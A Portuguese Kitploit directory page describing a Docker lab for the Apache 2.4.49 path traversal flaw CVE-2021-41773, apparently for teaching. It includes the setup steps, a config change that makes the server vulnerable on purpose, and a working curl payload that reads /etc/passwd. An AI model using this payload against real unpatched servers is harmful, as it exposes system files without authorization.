Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2021-41773 — Ambiente de laboratório baseado em Docker para a vulnerabilidade de path traversal do Apache CVE-2021-41773 com exploit PoC e guia detalhado para testes de segurança e educação. | Kitploit
Ferramentas/GitHubGitHub/jiyun02/cve-2021-41773
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubjiyun02/cve-2021-41773

cve-2021-41773

Ambiente de laboratório baseado em Docker para a vulnerabilidade de path traversal do Apache CVE-2021-41773 com exploit PoC e guia detalhado para testes de segurança e educação.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-41773 – Relatório de Path Traversal do Apache


Resumo

  • Vulnerabilidade encontrada na versão 2.4.49 do Apache HTTP Server que, dependendo da configuração do servidor web, pode expor arquivos sensíveis do sistema através de um ataque de Path Traversal
  • Path Traversal: Atacantes podem usar caminhos contendo ../ para acessar arquivos fora da raiz da web

Informações

  • Nome da vulnerabilidade: CVE-2021-41773
  • Versões afetadas: Apache HTTP Server 2.4.49
  • Tipo de vulnerabilidade: Path Traversal
  • Status do patch oficial: Corrigido na versão 2.4.50 ou superior

Configuração do ambiente de laboratório

  • Imagem base: 'httpd:2.4.49' (DockerHub)
  • Forma de execução do container: Dockerfile + docker-compose.yml
  • Porta de execução: 8080 → mapeada para a porta 80 do container
  • Alteração de configuração do Apache: Modificado para 'Require all granted' (para permitir Path Traversal)

Como executar o ambiente

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

Prova de Conceito (PoC) da vulnerabilidade

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Processo detalhado

  1. Executar o diretório para a tarefa image
image
  1. Criação do Dockerfile image

-> Imagem Base: httpd:2.4.49 (versão que contém a vulnerabilidade)

-> 'sed -i 's/Require all denied/Require all granted/g' : Permite Path Traversal e acesso externo

  1. docker-compose.yml image

-> Definição do Apache

-> Mapeamento da porta 8080 para a porta 80 do container

  1. Execução do docker

    image
  2. Execução do PoC

    image

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd contém informações sensíveis, %2e é a palavra codificada para .. que é o comando para subir diretórios

-> Manipula o caminho para que o servidor acesse /etc/passwd e o exiba

  1. Resultado da execução image

-> Conforme a imagem acima, é possível acessar diretórios sensíveis


URL do repositório acessível via Fork

https://github.com/JIYUN02/cve-2021-41773

-> Histórico de commits existente

Baixar ferramenta